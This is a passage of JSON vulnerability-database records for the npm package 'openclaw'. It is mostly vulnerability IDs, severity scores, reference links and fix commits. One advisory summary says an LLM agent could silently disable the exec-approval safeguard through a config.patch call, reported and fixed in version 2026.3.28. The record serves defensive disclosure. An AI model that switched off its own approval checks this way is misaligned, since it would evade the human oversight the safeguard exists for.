wu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35670","GHSA-wv46-v6xc-2qhf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-asuy-amja-eyd4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90150?format=json","vulnerability_id":"VCID-atn7-pn13-3fgb","summary":"OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch`\n## Summary\nAgentic Consent Bypass: LLM Agent Can Silently Disable Exec Approval via `config.patch`\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Maintainers accepted this issue, fixed it in 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `76411b2afc4ae721e36c12e0ea24fd23e2fed61e` — 2026-03-27T09:42:15Z\n\nOpenClaw thanks @YLChen-007 for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw"},{"reference_url":"https://github.com/advisories/GHSA-v3qc-wrwx-j3pw","reference_id":"GHSA-v3qc-wrwx-j3pw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v3qc-wrwx-j3pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-v3qc-wrwx-j3pw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-atn7-pn13-3fgb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89019?format=json","vulnerability_id":"VCID-axp9-mt9z-gkgw","summary":"OpenClaw runs Discord audio preflight transcription before member authorization\n## Summary\nDiscord audio preflight transcription before member authorization\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41374","reference_id":"","reference_type":"","scores":[{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24049","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.23978","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24032","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41374"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41374","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41374"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization"},{"reference_url":"https://github.com/advisories/GHSA-hhff-fj5f-qg48","reference_id":"GHSA-hhff-fj5f-qg48","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hhff-fj5f-qg48"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-eb